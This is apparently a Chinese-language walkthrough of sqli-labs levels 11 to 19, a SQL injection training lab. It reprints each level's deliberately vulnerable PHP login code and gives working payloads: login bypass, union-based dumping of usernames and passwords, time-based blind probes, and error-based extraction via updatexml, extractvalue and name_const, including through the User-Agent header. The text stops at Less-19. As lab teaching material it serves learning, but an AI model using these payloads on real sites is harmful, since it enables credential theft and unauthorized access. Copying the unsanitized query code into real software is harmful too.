Less-11 基于错误的POST型单引号字符型注入
①先打开网页查看 Welcome Dhakkan
②查看源代码:
- <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
- <html xmlns="http://www.w3.org/1999/xhtml">
- <head>
- <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
- <title>Less-11- Error Based- String</title>
- </head>
- <body bgcolor="#000000">
- <div style=" margin-top:20px;color:#FFF; font-size:24px; text-align:center"> Welcome <font color="#FF0000"> Dhakkan </font><br></div>
- <div align="center" style="margin:40px 0px 0px 520px;border:20px; background-color:#0CF; text-align:center; width:400px; height:150px;">
- <div style="padding-top:10px; font-size:15px;">
- <!--Form to post the data for sql injections Error based SQL Injection-->
- <form action="" name="form1" method="post">
- <div style="margin-top:15px; height:30px;">Username :
- <input type="text" name="uname" value=""/>
- </div>
- <div> Password :
- <input type="text" name="passwd" value=""/>
- </div></br>
- <div style=" margin-top:9px;margin-left:90px;">
- <input type="submit" name="submit" value="Submit" />
- </div>
- </form>
- </div></div>
- <div style=" margin-top:10px;color:#FFF; font-size:23px; text-align:center">
- <font size="6" color="#FFFF00">
- <?php
- //including the Mysql connect parameters.
- include("../sql-connections/sql-connect.php");
- error_reporting(0);
- // take the variables
- if(isset($_POST['uname']) && isset($_POST['passwd']))
- {
- $uname=$_POST['uname'];
- $passwd=$_POST['passwd'];
- //logging the connection parameters to a file for analysis.
- $fp=fopen('result.txt','a');
- fwrite($fp,'User Name:'.$uname);
- fwrite($fp,'Password:'.$passwd."\n");
- fclose($fp);
- // connectivity
- @$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
- $result=mysql_query($sql);
- $row = mysql_fetch_array($result);
- if($row)
- {
- //echo '<font color= "#0000ff">';
- echo "<br>";
- echo '<font color= "#FFFF00" font size = 4>';
- //echo " You Have successfully logged in\n\n " ;
- echo '<font size="3" color="#0000ff">';
- echo "<br>";
- echo 'Your Login name:'. $row['username'];
- echo "<br>";
- echo 'Your Password:' .$row['password'];
- echo "<br>";
- echo "</font>";
- echo "<br>";
- echo "<br>";
- echo '<img src="../images/flag.jpg" />';
- echo "</font>";
- }
- else
- {
- echo '<font color= "#0000ff" font size="3">';
- //echo "Try again looser";
- print_r(mysql_error());
- echo "</br>";
- echo "</br>";
- echo "</br>";
- echo '<img src="../images/slap.jpg" />';
- echo "</font>";
- }
- }
- ?>
- </font>
- </div>
- </body>
- </html>
我们来看一下这次是什么类型的提交,以及提交的字段是什么,打开网络查看器查看
答案是POST提交,提交的字段是uname和passwd,那么我们加一个单引号让它报错:
我们把 整个被单引号引着的复制下来,把左端和右端的单引号去掉,就变成下面的:
- test' LIMIT 0,1
那么可以判断是单引号注入类型了,接下来构建 POST 提交:
- uname=user' or 1=1 #&passwd=user'
拿到用户名和密码了,登陆一下,成功登陆,当然除了用注释还可以闭合单引号,当这里有个问题探讨,看下图
没有显示出来?我们看下 Sql 语句是什么样的:
- SELECT username,password From users WHERE username='user' or '1'='1' and password='user' LIMIT 0,1
首先and的优先级高于or 【就是and先运算】,那么 '1'='1' and password='user' 先运算,因为users表里面的password字段没有一个数据是user,右边是false,那么整个表达式就是false,那么语句就变成:
- SELECT username, password FROM users WHERE username='user' or false
所以我们要怎么办呢,uname这里不行,我们尝试passwd,发现是可以的
对应的SQL语句是:
- SELECT username,password FROM users WHERE username='user' and password='user' or '1'='1' LIMIT 0,1
左边是FALSE,or 右边是true,当然就绕过了,一般第一个登陆字段(一般是用户名)就用注释,第二个登陆字段(一般就密码)用闭合和注释都是可以的。
接下类我们就可以使用 联合查询来看下数据库的信息:
构建如下 POST字段:
- uname=user&passwd=user' union select group_concat(char(32),username,char(32)),group_concat(char(32),password,char(32)) from users#
当然,想用盲注也可以,就是要写脚本
- uname=user&passwd=user' or length(database())=8#
Less-12
基于错误的双引号POST型字符型变形的注入
①
先打开网页查看 Welcome Dhakkan
②查看源代码:
- <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
- <html xmlns="http://www.w3.org/1999/xhtml">
- <head>
- <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
- <title>Less-12- Error Based- Double quotes- String</title>
- </head>
- <body bgcolor="#000000">
- <div style=" margin-top:20px;color:#FFF; font-size:24px; text-align:center"> Welcome <font color="#FF0000"> Dhakkan </font><br></div>
- <div align="center" style="margin:40px 0px 0px 520px;border:20px; background-color:#0CF; text-align:center; width:400px; height:150px;">
- <div style="padding-top:10px; font-size:15px;">
- <!--Form to post the data for sql injections Error based SQL Injection-->
- <form action="" name="form1" method="post">
- <div style="margin-top:15px; height:30px;">Username :
- <input type="text" name="uname" value=""/>
- </div>
- <div> Password :
- <input type="text" name="passwd" value=""/>
- </div></br>
- <div style=" margin-top:9px;margin-left:90px;">
- <input type="submit" name="submit" value="Submit" />
- </div>
- </form>
- </div></div>
- <div style=" margin-top:10px;color:#FFF; font-size:23px; text-align:center">
- <font size="6" color="#FFFF00">
- <?php
- //including the Mysql connect parameters.
- include("../sql-connections/sql-connect.php");
- error_reporting(0);
- // take the variables
- if(isset($_POST['uname']) && isset($_POST['passwd']))
- {
- $uname=$_POST['uname'];
- $passwd=$_POST['passwd'];
- //logging the connection parameters to a file for analysis.
- $fp=fopen('result.txt','a');
- fwrite($fp,'User Name:'.$uname."\n");
- fwrite($fp,'Password:'.$passwd."\n");
- fclose($fp);
- // connectivity
- $uname='"'.$uname.'"';
- $passwd='"'.$passwd.'"';
- @$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";
- $result=mysql_query($sql);
- $row = mysql_fetch_array($result);
- if($row)
- {
- //echo '<font color= "#0000ff">';
- echo "<br>";
- echo '<font color= "#FFFF00" font size = 4>';
- //echo " You Have successfully logged in " ;
- echo '<font size="3" color="#0000ff">';
- echo "<br>";
- echo 'Your Login name:'. $row['username'];
- echo "<br>";
- echo 'Your Password:' .$row['password'];
- echo "<br>";
- echo "</font>";
- echo "<br>";
- echo "<br>";
- echo '<img src="../images/flag.jpg" />';
- echo "</font>";
- }
- else
- {
- echo '<font color= "#0000ff" font size="3">';
- //echo "Try again looser";
- print_r(mysql_error());
- echo "</br>";
- echo "</br>";
- echo "</br>";
- echo '<img src="../images/slap.jpg" />';
- echo "</font>";
- }
- }
- ?>
- </font>
- </div>
- </body>
- </html>
先用什么单引号双引号看看,报错就看出它有没有用引号,或者加了其他东西
那么这里明显看出用)将变量括着,那么直接绕过,构建 POST 字段:
- uname=abc&passwd=abc") or 1=1#
Less-13POST单引号变形双注入
①
先打开网页查看 Welcome Dhakkan
②查看源代码:
- <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
- <html xmlns="http://www.w3.org/1999/xhtml">
- <head>
- <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
- <title>Less-13- Double Injection- String- with twist</title>
- </head>
- <body bgcolor="#000000">
- <div style=" margin-top:20px;color:#FFF; font-size:24px; text-align:center"> Welcome <font color="#FF0000"> Dhakkan </font><br></div>
- <div align="center" style="margin:40px 0px 0px 520px;border:20px; background-color:#0CF; text-align:center; width:400px; height:150px;">
- <div style="padding-top:10px; font-size:15px;">
- <!--Form to post the data for sql injections Error based SQL Injection-->
- <form action="" name="form1" method="post">
- <div style="margin-top:15px; height:30px;">Username :
- <input type="text" name="uname" value=""/>
- </div>
- <div> Password :
- <input type="text" name="passwd" value=""/>
- </div></br>
- <div style=" margin-top:9px;margin-left:90px;">
- <input type="submit" name="submit" value="Submit" />
- </div>
- </form>
- </div></div>
- <div style=" margin-top:10px;color:#FFF; font-size:23px; text-align:center">
- <font size="6" color="#FFFF00">
- <?php
- //including the Mysql connect parameters.
- include("../sql-connections/sql-connect.php");
- error_reporting(0);
- // take the variables
- if(isset($_POST['uname']) && isset($_POST['passwd']))
- {
- $uname=$_POST['uname'];
- $passwd=$_POST['passwd'];
- //logging the connection parameters to a file for analysis.
- $fp=fopen('result.txt','a');
- fwrite($fp,'User Name:'.$uname."\n");
- fwrite($fp,'Password:'.$passwd."\n");
- fclose($fp);
- // connectivity
- @$sql="SELECT username, password FROM users WHERE username=('$uname') and password=('$passwd') LIMIT 0,1";
- $result=mysql_query($sql);
- $row = mysql_fetch_array($result);
- if($row)
- {
- //echo '<font color= "#0000ff">';
- echo "<br>";
- echo '<font color= "#FFFF00" font size = 4>';
- //echo " You Have successfully logged in " ;
- echo '<font size="3" color="#0000ff">';
- echo "<br>";
- //echo 'Your Login name:'. $row['username'];
- //echo "<br>";
- //echo 'Your Password:' .$row['password'];
- //echo "<br>";
- echo "</font>";
- echo "<br>";
- echo "<br>";
- echo '<img src="../images/flag.jpg" />';
- echo "</font>";
- }
- else
- {
- echo '<font color= "#0000ff" font size="3">';
- //echo "Try again looser";
- print_r(mysql_error());
- echo "</br>";
- echo "</br>";
- echo "</br>";
- echo '<img src="../images/slap.jpg" />';
- echo "</font>";
- }
- }
- ?>
- </font>
- </div>
- </body>
- </html>
没多少区别,之前也讲过了,根据判断可以得知是 (' $id ') 类型的,那么
Less-14POST单引号变形双注入
①
先打开网页查看 Welcome Dhakkan
②查看源代码:
- <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
- <html xmlns="http://www.w3.org/1999/xhtml">
- <head>
- <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
- <title>Less-14- Double Injection- Double quotes- String</title>
- </head>
- <body bgcolor="#000000">
- <div style=" margin-top:20px;color:#FFF; font-size:24px; text-align:center"> Welcome <font color="#FF0000"> Dhakkan </font><br></div>
- <div align="center" style="margin:40px 0px 0px 520px;border:20px; background-color:#0CF; text-align:center; width:400px; height:150px;">
- <div style="padding-top:10px; font-size:15px;">
- <!--Form to post the data for sql injections Error based SQL Injection-->
- <form action="" name="form1" method="post">
- <div style="margin-top:15px; height:30px;">Username :
- <input type="text" name="uname" value=""/>
- </div>
- <div> Password :
- <input type="text" name="passwd" value=""/>
- </div></br>
- <div style=" margin-top:9px;margin-left:90px;">
- <input type="submit" name="submit" value="Submit" />
- </div>
- </form>
- </div></div>
- <div style=" margin-top:10px;color:#FFF; font-size:23px; text-align:center">
- <font size="6" color="#FFFF00">
- <?php
- //including the Mysql connect parameters.
- include("../sql-connections/sql-connect.php");
- error_reporting(0);
- // take the variables
- if(isset($_POST['uname']) && isset($_POST['passwd']))
- {
- $uname=$_POST['uname'];
- $passwd=$_POST['passwd'];
- //logging the connection parameters to a file for analysis.
- $fp=fopen('result.txt','a');
- fwrite($fp,'User Name:'.$uname."\n");
- fwrite($fp,'Password:'.$passwd."\n");
- fclose($fp);
- // connectivity
- $uname='"'.$uname.'"';
- $passwd='"'.$passwd.'"';
- @$sql="SELECT username, password FROM users WHERE username=$uname and password=$passwd LIMIT 0,1";
- $result=mysql_query($sql);
- $row = mysql_fetch_array($result);
- if($row)
- {
- //echo '<font color= "#0000ff">';
- echo "<br>";
- echo '<font color= "#FFFF00" font size = 4>';
- //echo " You Have successfully logged in " ;
- echo '<font size="3" color="#0000ff">';
- echo "<br>";
- //echo 'Your Login name:'. $row['username'];
- //echo "<br>";
- //echo 'Your Password:' .$row['password'];
- //echo "<br>";
- echo "</font>";
- echo "<br>";
- echo "<br>";
- echo '<img src="../images/flag.jpg" />';
- echo "</font>";
- }
- else
- {
- echo '<font color= "#0000ff" font size="3">';
- //echo "Try again looser";
- print_r(mysql_error());
- echo "</br>";
- echo "</br>";
- echo "</br>";
- echo '<img src="../images/slap.jpg" />';
- echo "</font>";
- }
- }
- ?>
- </font>
- </div>
- </body>
- </html>
单引号没报错,双引号就报错了,然后就不说了,都懂
Less-15基于bool型/时间延迟单引号POST型盲注
①
先打开网页查看 Welcome Dhakkan
②查看源代码:
- <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
- <html xmlns="http://www.w3.org/1999/xhtml">
- <head>
- <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
- <title>Less-15- Blind- Boolian Based- String</title>
- </head>
- <body bgcolor="#000000">
- <div style=" margin-top:20px;color:#FFF; font-size:24px; text-align:center"> Welcome <font color="#FF0000"> Dhakkan </font><br></div>
- <div align="center" style="margin:40px 0px 0px 520px;border:20px; background-color:#0CF; text-align:center; width:400px; height:150px;">
- <div style="padding-top:10px; font-size:15px;">
- <!--Form to post the data for sql injections Error based SQL Injection-->
- <form action="" name="form1" method="post">
- <div style="margin-top:15px; height:30px;">Username :
- <input type="text" name="uname" value=""/>
- </div>
- <div> Password :
- <input type="text" name="passwd" value=""/>
- </div></br>
- <div style=" margin-top:9px;margin-left:90px;">
- <input type="submit" name="submit" value="Submit" />
- </div>
- </form>
- </div></div>
- <div style=" margin-top:10px;color:#FFF; font-size:23px; text-align:center">
- <font size="6" color="#FFFF00">
- <?php
- //including the Mysql connect parameters.
- include("../sql-connections/sql-connect.php");
- error_reporting(0);
- // take the variables
- if(isset($_POST['uname']) && isset($_POST['passwd']))
- {
- $uname=$_POST['uname'];
- $passwd=$_POST['passwd'];
- //logging the connection parameters to a file for analysis.
- $fp=fopen('result.txt','a');
- fwrite($fp,'User Name:'.$uname);
- fwrite($fp,'Password:'.$passwd."\n");
- fclose($fp);
- // connectivity
- @$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
- $result=mysql_query($sql);
- $row = mysql_fetch_array($result);
- if($row)
- {
- //echo '<font color= "#0000ff">';
- echo "<br>";
- echo '<font color= "#FFFF00" font size = 4>';
- //echo " You Have successfully logged in\n\n " ;
- echo '<font size="3" color="#0000ff">';
- echo "<br>";
- //echo 'Your Login name:'. $row['username'];
- echo "<br>";
- //echo 'Your Password:' .$row['password'];
- echo "<br>";
- echo "</font>";
- echo "<br>";
- echo "<br>";
- echo '<img src="../images/flag.jpg" />';
- echo "</font>";
- }
- else
- {
- echo '<font color= "#0000ff" font size="3">';
- //echo "Try again looser";
- //print_r(mysql_error());
- echo "</br>";
- echo "</br>";
- echo "</br>";
- echo '<img src="../images/slap.jpg" />';
- echo "</font>";
- }
- }
- ?>
- </font>
- </div>
- </body>
- </html>
这里输入单引号,双引号就不会报错了,用时间延迟函数了,先确定是单引号盲注:
ok,没错。
Less-16基于bool型/时间延迟的双引号POST型盲注
①
先打开网页查看 Welcome Dhakkan
②查看源代码:
- <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
- <html xmlns="http://www.w3.org/1999/xhtml">
- <head>
- <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
- <title>Less-16- Blind- Time Based- Double quotes- String</title>
- </head>
- <body bgcolor="#000000">
- <div style=" margin-top:20px;color:#FFF; font-size:24px; text-align:center"> Welcome <font color="#FF0000"> Dhakkan </font><br></div>
- <div align="center" style="margin:40px 0px 0px 520px;border:20px; background-color:#0CF; text-align:center; width:400px; height:150px;">
- <div style="padding-top:10px; font-size:15px;">
- <!--Form to post the data for sql injections Error based SQL Injection-->
- <form action="" name="form1" method="post">
- <div style="margin-top:15px; height:30px;">Username :
- <input type="text" name="uname" value=""/>
- </div>
- <div> Password :
- <input type="text" name="passwd" value=""/>
- </div></br>
- <div style=" margin-top:9px;margin-left:90px;">
- <input type="submit" name="submit" value="Submit" />
- </div>
- </form>
- </div></div>
- <div style=" margin-top:10px;color:#FFF; font-size:23px; text-align:center">
- <font size="6" color="#FFFF00">
- <?php
- //including the Mysql connect parameters.
- include("../sql-connections/sql-connect.php");
- error_reporting(0);
- // take the variables
- if(isset($_POST['uname']) && isset($_POST['passwd']))
- {
- $uname=$_POST['uname'];
- $passwd=$_POST['passwd'];
- //logging the connection parameters to a file for analysis.
- $fp=fopen('result.txt','a');
- fwrite($fp,'User Name:'.$uname."\n");
- fwrite($fp,'Password:'.$passwd."\n");
- fclose($fp);
- // connectivity
- $uname='"'.$uname.'"';
- $passwd='"'.$passwd.'"';
- @$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";
- $result=mysql_query($sql);
- $row = mysql_fetch_array($result);
- if($row)
- {
- //echo '<font color= "#0000ff">';
- echo "<br>";
- echo '<font color= "#FFFF00" font size = 4>';
- //echo " You Have successfully logged in " ;
- echo '<font size="3" color="#0000ff">';
- echo "<br>";
- //echo 'Your Login name:'. $row['username'];
- echo "<br>";
- //echo 'Your Password:' .$row['password'];
- echo "<br>";
- echo "</font>";
- echo "<br>";
- echo "<br>";
- echo '<img src="../images/flag.jpg" />';
- echo "</font>";
- }
- else
- {
- echo '<font color= "#0000ff" font size="3">';
- echo "</br>";
- echo "</br>";
- //echo "Try again looser";
- //print_r(mysql_error());
- echo "</br>";
- echo "</br>";
- echo "</br>";
- echo '<img src="../images/slap.jpg" />';
- echo "</font>";
- }
- }
- ?>
- </font>
- </div>
- </body>
- </html>
uname=a&passwd=a") or 1=1# ,判断为双引号变形,测试:
uname=a&passwd=a") or if(length(database())=7,1,sleep(5)) #
uname=a&passwd=a") or if(length(database())=8,1,sleep(5)) #
Less-17基于错误的更新查询POST注入
①
先打开网页查看 Welcome Dhakkan
②查看源代码:
- <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
- <html xmlns="http://www.w3.org/1999/xhtml">
- <head>
- <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
- <title>Less-17 Update Query- Error based - String</title>
- </head>
- <body bgcolor="#000000">
- <div style=" margin-top:20px;color:#FFF; font-size:24px; text-align:center"><font color="#FFFF00"> [PASSWORD RESET] </br></font> <font color="#FF0000"> Dhakkan </font><br></div>
- <div align="center" style="margin:20px 0px 0px 520px;border:20px; background-color:#0CF; text-align:center; width:400px; height:150px;">
- <div style="padding-top:10px; font-size:15px;">
- <!--Form to post the contents -->
- <form action="" name="form1" method="post">
- <div style="margin-top:15px; height:30px;">User Name :
- <input type="text" name="uname" value=""/> </div>
- <div> New Password :
- <input type="text" name="passwd" value=""/></div></br>
- <div style=" margin-top:9px;margin-left:90px;"><input type="submit" name="submit" value="Submit" /></div>
- </form>
- </div>
- </div>
- <div style=" margin-top:10px;color:#FFF; font-size:23px; text-align:center">
- <font size="6" color="#FFFF00">
- <?php
- //including the Mysql connect parameters.
- include("../sql-connections/sql-connect.php");
- error_reporting(0);
- function check_input($value)
- {
- if(!empty($value))
- {
- // truncation (see comments)
- $value = substr($value,0,15);
- }
- // Stripslashes if magic quotes enabled
- if (get_magic_quotes_gpc())
- {
- $value = stripslashes($value);
- }
- // Quote if not a number
- if (!ctype_digit($value))
- {
- $value = "'" . mysql_real_escape_string($value) . "'";
- }
- else
- {
- $value = intval($value);
- }
- return $value;
- }
- // take the variables
- if(isset($_POST['uname']) && isset($_POST['passwd']))
- {
- //making sure uname is not injectable
- $uname=check_input($_POST['uname']);
- $passwd=$_POST['passwd'];
- //logging the connection parameters to a file for analysis.
- $fp=fopen('result.txt','a');
- fwrite($fp,'User Name:'.$uname."\n");
- fwrite($fp,'New Password:'.$passwd."\n");
- fclose($fp);
- // connectivity
- @$sql="SELECT username, password FROM users WHERE username= $uname LIMIT 0,1";
- $result=mysql_query($sql);
- $row = mysql_fetch_array($result);
- //echo $row;
- if($row)
- {
- //echo '<font color= "#0000ff">';
- $row1 = $row['username'];
- //echo 'Your Login name:'. $row1;
- $update="UPDATE users SET password = '$passwd' WHERE username='$row1'";
- mysql_query($update);
- echo "<br>";
- if (mysql_error())
- {
- echo '<font color= "#FFFF00" font size = 3 >';
- print_r(mysql_error());
- echo "</br></br>";
- echo "</font>";
- }
- else
- {
- echo '<font color= "#FFFF00" font size = 3 >';
- //echo " You password has been successfully updated " ;
- echo "<br>";
- echo "</font>";
- }
- echo '<img src="../images/flag1.jpg" />';
- //echo 'Your Password:' .$row['password'];
- echo "</font>";
- }
- else
- {
- echo '<font size="4.5" color="#FFFF00">';
- //echo "Bug off you Silly Dumb hacker";
- echo "</br>";
- echo '<img src="../images/slap1.jpg" />';
- echo "</font>";
- }
- }
- ?>
- </font>
- </div>
- </body>
- </html>
来分析一下代码,他的大概执行过程是接收到username和password后,首先根据username的值查询数据库返回username和password,然后再将原有的password值用接收到的值替换掉,这里有一个问题是,username在接收时用了一个自定义的过滤函数check_input(),这个函数首先做了判空处理,合法就截取username的前15个字符,然后是通过get_magic_quotes_gpc()的返回值判断magic_quotes_gpc的值是on还是off:
magic_quotes_gpc=on时, 不用对输入和输出数据库的字符串数据作addslashes()和stripslashes()的操作,数据也会正常显示。如果此时对输入的数据作了addslashes()处理,那么在输出的时候就必须使用stripslashes()去掉多余的反斜杠。
magic_quotes_gpc=off 时,必须使用addslashes()对输入数据进行处理,但并不需要使用stripslashes()格式化输出,因为addslashes()并未将反斜杠一起写入数据库,只是帮助mysql完成了sql语句的执行。
最后,他用了ctype_digit()判断username值的类型是否是数字,是字符就用mysql_real_escape_string对特殊字符进行转义
显然,username这里并不好注入,只有通过弱口令爆破,像是admin之类的,但是他对password的接收没有做过滤的处理,于是我们可以在这里动手脚
- $uname=check_input($_POST['uname']);
- $passwd=$_POST['passwd'];
对于update的注入有几种思路,我们将他连同insert和delete一起来总结一下:
1、子查询注入
子查询注入原理即双注入,对于dateup、delete和insert通常都是结合or的逻辑判断,本题为例我们对update可以构造如下语句
获取数据库名:
- uname=admin&passwd=' or (select 1 from(select count(*),concat((select concat(0x7e,0x27,database(),0x27,0x7e)),floor(rand()*2))x from information_schema.tables group by x)a) where username='admin'%23
获取表名:
- uname=admin&passwd=' or (select 1 from(select count(*),concat((select group_concat(0x7e,0x27,table_name,0x27,0x7e) from information_schema.tables where table_schema='security'),floor(rand()*2))x from information_schema.tables group by x)a) where username='admin'%23
获取字段名:
- uname=admin&passwd=' or (select 1 from(select count(*),concat((select group_concat(0x7e,0x27,column_name,0x27,0x7e) from information_schema.columns where table_schema='security' and table_name='users'),floor(rand()*2))x from information_schema.tables group by x)a) where username='admin'%23
获取用户信息,这里不知道为什么执行不成功:
- uname=admin&passwd=' or (select 1 from(select count(*),concat((select concat(0x27,id,0x7e,username,0x7e,password,0x27) from users limit 0,1),floor(rand()*2))x from information_schema.tables group by x)a) where username='admin'%23
如果有哪位朋友知道怎么解决,麻烦在下面评论区提出解决方法,有可能是我mysql版本的问题吧。
2、通过name_const():
name_const(
name
,
value
):返回给定值,当用来产生一个结果集合列时, name_
const
()促使该列使用给定名称,
但他的使用范围受限,只适用于一些数据库版本高于5.0.12,但又稍旧的版本,像现在的5.7版本就不用想了...然而我用的就是较新的版本,注入只能显示数据库的版本信息,想要查询其他的信息,会显示Incorrect arguments to NAME_CONST,所以,这里我就不截图了,直接放payload:
- uname=admin&passwd=1' or (select * from (select(name_const(database(),1)),name_const(database(),1))a) where username='admin'%23
- uname=admin&passwd=1' or (select * from (select(name_const((select group_concat(table_name) from information_schema.tables where table_schema='security'),1)),name_const((select group_concat(table_name) from information_schema.tables where table_schema='security'),1))a)
总的来说,对于update,insert和delete都有一个固定的结构:... or (select * from(select name_const((select ...),1),name_const((select...),1))a) ...
3、通过updatexml():payload:updatexml(1,concat(0x7e,(version())),0)
updatexml(xml_target,xpath_expr,new_xml)函数:
第一个参数是 目标xml
第二个参数是 xpath的表达式,这个看w3c那个xpath教程
第三个参数是 要将xpath的表达式的东西将目标xml替换成什么
xpath教程看这 http://www.w3school.com.cn/xpath/
xml_target和new_xml参数随便设定一个数就行,这里主要让他报错
首先获取数据库名:
- <span style="font-size:18px;">uname=admin&passwd=' or updatexml(1,concat(0x7e,concat(database()),0x7e),1)#</span>
获取表名:
- <span style="font-size:18px;">uname=admin&passwd=' or updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)#</span>
获取字段名:
- uname=admin&passwd=' or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1)#
获取用户信息,当然这里也失败了:
- uname=admin&passwd=' or updatexml(1,concat(0x7e,(select * from(select concat_ws(char(32,44,32),id,username,password) from users limit 0,1)a),0x7e),0)#
- INSERT INTO users (id, username, password) VALUES (2,'Olivia' or updatexml(1,concat(0x7e,(
- select b.n from (select concat_ws(char(32,44,32),id,username,password) n from users u where u.id=1)b
- )),0) or'', 'Nervo');
4、通过extractvalue():
extractvalue(xml,value)函数也是MYSQL5.1以后推出的对XML文档数据进行查询和修改的XPATH函数,注入时第一个参数随便给一个数字。
直接上payload:
- uname=admin&passwd=' or extractvalue(1,concat(0x7e,(select * from(select concat_ws(char(32,44,32),id,username,password) from users limit 0,1)a),0x7e))%23
Less-18基于错误的用户代理,头部POST注入
①
先打开网页查看 Welcome Dhakkan
②查看源码:
- <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
- <html xmlns="http://www.w3.org/1999/xhtml">
- <head>
- <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
- <title>Less-18 Header Injection- Error Based- string</title>
- </head>
- <body bgcolor="#000000">
- <div style=" margin-top:20px;color:#FFF; font-size:24px; text-align:center"> Welcome <font color="#FF0000"> Dhakkan </font><br></div>
- <div align="center" style="margin:20px 0px 0px 510px;border:20px; background-color:#0CF; text-align:center;width:400px; height:150px;">
- <div style="padding-top:10px; font-size:15px;">
- <!--Form to post the contents -->
- <form action="" name="form1" method="post">
- <div style="margin-top:15px; height:30px;">Username :
- <input type="text" name="uname" value=""/> </div>
- <div> Password :
- <input type="text" name="passwd" value=""/></div></br>
- <div style=" margin-top:9px;margin-left:90px;"><input type="submit" name="submit" value="Submit" /></div>
- </form>
- </div>
- </div>
- <div style=" margin-top:10px;color:#FFF; font-size:23px; text-align:center">
- <font size="3" color="#FFFF00">
- <?php
- //including the Mysql connect parameters.
- include("../sql-connections/sql-connect.php");
- error_reporting(0);
- function check_input($value)
- {
- if(!empty($value))
- {
- // truncation (see comments)
- $value = substr($value,0,20);
- }
- // Stripslashes if magic quotes enabled
- if (get_magic_quotes_gpc())
- {
- $value = stripslashes($value);
- }
- // Quote if not a number
- if (!ctype_digit($value))
- {
- $value = "'" . mysql_real_escape_string($value) . "'";
- }
- else
- {
- $value = intval($value);
- }
- return $value;
- }
- $uagent = $_SERVER['HTTP_USER_AGENT'];
- $IP = $_SERVER['REMOTE_ADDR'];
- echo "<br>";
- echo 'Your IP ADDRESS is: ' .$IP;
- echo "<br>";
- //echo 'Your User Agent is: ' .$uagent;
- // take the variables
- if(isset($_POST['uname']) && isset($_POST['passwd']))
- {
- $uname = check_input($_POST['uname']);
- $passwd = check_input($_POST['passwd']);
- /*
- echo 'Your Your User name:'. $uname;
- echo "<br>";
- echo 'Your Password:'. $passwd;
- echo "<br>";
- echo 'Your User Agent String:'. $uagent;
- echo "<br>";
- echo 'Your User Agent String:'. $IP;
- */
- //logging the connection parameters to a file for analysis.
- $fp=fopen('result.txt','a');
- fwrite($fp,'User Agent:'.$uname."\n");
- fclose($fp);
- $sql="SELECT users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
- $result1 = mysql_query($sql);
- $row1 = mysql_fetch_array($result1);
- if($row1)
- {
- echo '<font color= "#FFFF00" font size = 3 >';
- $insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";
- mysql_query($insert);
- //echo 'Your IP ADDRESS is: ' .$IP;
- echo "</font>";
- //echo "<br>";
- echo '<font color= "#0000ff" font size = 3 >';
- echo 'Your User Agent is: ' .$uagent;
- echo "</font>";
- echo "<br>";
- print_r(mysql_error());
- echo "<br><br>";
- echo '<img src="../images/flag.jpg" />';
- echo "<br>";
- }
- else
- {
- echo '<font color= "#0000ff" font size="3">';
- //echo "Try again looser";
- print_r(mysql_error());
- echo "</br>";
- echo "</br>";
- echo '<img src="../images/slap.jpg" />';
- echo "</font>";
- }
- }
- ?>
- </font>
- </div>
- </body>
- </html>
对uname和passwd进行了check_input()函数的处理,所以我们在输入uname和passwd上进行注入是不行的,但
是在代码中,我们看到了insert()
- $insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";
将useragent和ip插入到数据库中,那么我们是不是可以用这个来进行注入呢?Ip地址我们这里修改不是很方便,但是useragent修改较为方便,我们从useragent入手。
那么用什么工具手注呢,burp的repeater非常方便,用火狐的某些插件应该也可以如live http headers,tamper data,下面我用 burp suite 来演示
首先这里要输入正确的账号和密码才能绕过账号密码判断,进入处理uagent部分,这里跟我们现实中的注册登录再注入是比较贴合,这里我们输入正确的账号密码就输出我们的uagent
接下来,利用 Burp suite 抓包改包,获取数据库名称,有很多种方式,构建语句:
- ' or updatexml(1,concat(0x2b5e,database()),0) or '
- ‘and extractvalue(1,concat(0x7e,(database())) and ‘1‘=‘1
就不按步骤来了,直接获取用户名和密码信息:
- ' or updatexml(1,concat(0x2b5e,(select concat_ws(0x2b5e,id,username,password) from users limit 0,1)),0) or '
Less-19基于头部的Referer POST报错
①
先打开网页查看 Welcome Dhakkan
②查看源代码:
- <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
